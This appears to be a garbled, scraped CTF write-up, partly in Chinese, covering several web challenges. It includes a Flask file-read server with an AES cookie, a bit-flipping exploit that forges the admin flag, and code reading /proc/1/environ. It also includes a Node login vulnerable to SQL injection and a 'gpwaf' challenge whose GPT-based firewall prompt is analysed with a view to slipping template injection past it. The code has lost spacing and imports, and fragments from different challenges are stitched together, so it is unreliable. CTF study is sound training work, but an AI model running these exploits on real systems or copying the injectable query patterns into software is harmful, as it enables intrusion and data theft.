from flask import Flask, request, abort from Crypto.Cipher import AES from Crypto.Random import get_random_bytes from Crypto.Util.Padding import pad, unpad from flask import Flask, request, Response from base64 import b64encode, b64decode
@app.route("/") defindex(): session = request.cookies.get('session') if session isNone: res = Response( "welcome to the FlipPIN server try request /hint to get the hint") res.set_cookie('session', encrypt(default_session).decode()) return res else: return'have a fun'
@app.route("/hint") defhint(): res = Response(open(__file__).read(), mimetype='text/plain') return res
@app.route("/read") deffile():
session = request.cookies.get('session') if session isNone: res = Response("you are not logged in") res.set_cookie('session', encrypt(default_session)) return res else: plain_session = decrypt(session) if plain_session isNone: return'don\'t hack me'
session_data = json.loads(plain_session)
if session_data['admin'] : filename = request.args.get('filename')
ifany(blacklist_str in filename for blacklist_str in filename_blacklist): abort(403, description='Access to this file is forbidden.')
try: withopen(filename, 'r') as f: return f.read() except FileNotFoundError: abort(404, description='File not found.') except Exception as e: abort(500, description=f'An error occurred: {str(e)}') else: return'You are not an administrator'
if __name__ == "__main__": app.run(host="0.0.0.0", port=9091, debug=True)
cipher = base64.b64decode('NGcMAGVYo/XqWTybD4TDonxbwAFSepn0xy0rzDrsIpylvnsjq5AobLr8uVhraQLNeTJMfe7usXGA6KDM+0uUIg=='.encode('utf-8')) x = cipher[0:10]+bytes([ord(chr(cipher[10]))^ord('1')^ord('0')])+cipher[11:] x = base64.b64encode(x).decode('utf-8') print(x)
with open("/proc/1/environ", 'r') as flag_file: flag_content = flag_file.read()
destination_file_path = os.path.join(destination_path, destination_file_name) with open(destination_file_path, 'a') as destination_file: destination_file.write(flag_content)
const query = `SELECT id FROM users WHERE username = '${user}' AND password = '${pass}';`; try { const id = db.prepare(query).get()?.id; if (!id) { return res.redirect("/?message=Incorrect username or password"); }
if (users[id] && isAdmin[user]) { return res.redirect("/?flag=" + encodeURIComponent(FLAG)); } return res.redirect("/?message=This system is currently only available to admins..."); } catch { return res.redirect("/?message=Nice try..."); } });
app.listen(PORT, () =>console.log(`web/funnylogin listening on port ${PORT}`));
让我们分解一下
1-创建名为users的表,具有id、用户名和密码属性
1 2 3 4 5
db.exec(`CREATE TABLE users( id INTEGER PRIMARY KEY, username TEXT, password TEXT );`);
const query = `SELECT id FROM users WHERE username = '${user}' AND password = '${pass}';`; try { const id = db.prepare(query).get()?.id; if (!id) { return res.redirect("/?message=Incorrect username or password"); }
if (users[id] && isAdmin[user]) { return res.redirect("/?flag=" + encodeURIComponent(FLAG)); } return res.redirect("/?message=This system is currently only available to admins..."); } catch { return res.redirect("/?message=Nice try..."); } });
const system = [ 'You are a web application firewall', 'Your goal is to stop attempted hacking attempts', 'I will give you a submission and you will respond with H or R, only a single letter', 'H means hacking attempt, R means not a hacking attempt' ].join('. ')
const html = `<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>gpwaf</title> <style> * { font-family: monospace; } #content { margin-left: auto; margin-right: auto; width: 100%; max-width: 830px; } button { font-size: 1.5em; } textarea { width: 100%; } </style> </head> <body> <div id="content"> <h1>gpwaf</h1> <p>i made a ejs renderer, its 100% hack proof im using gpt to check all your queries!</p> <form> <textarea name="template" placeholder="template" rows="30"><%= query %></textarea> <br> <button>run!</button> </form> <br> <pre><%= result %></pre> </div> </body> </html>`
SSTI模板注入这<%= query %>我们输入,也是<%= result %>应该可以拿到flag
查看模型从应用程序获得的提示,我们可以看到它被指示返回H表示黑客尝试,或者在输入“安全”时返回R。
1 2 3 4 5 6
const system = [ 'You are a web application firewall', 'Your goal is to stop attempted hacking attempts', 'I will give you a submission and you will respond with H or R, only a single letter', 'H means hacking attempt, R means not a hacking attempt' ].join('. ')
Description: For a better New Year, we are introducing a service that can help you reduce stress: <http://192.53.173.71:8080> . As our service is only available during the New Year, we are also providing you with a code for later use in material section.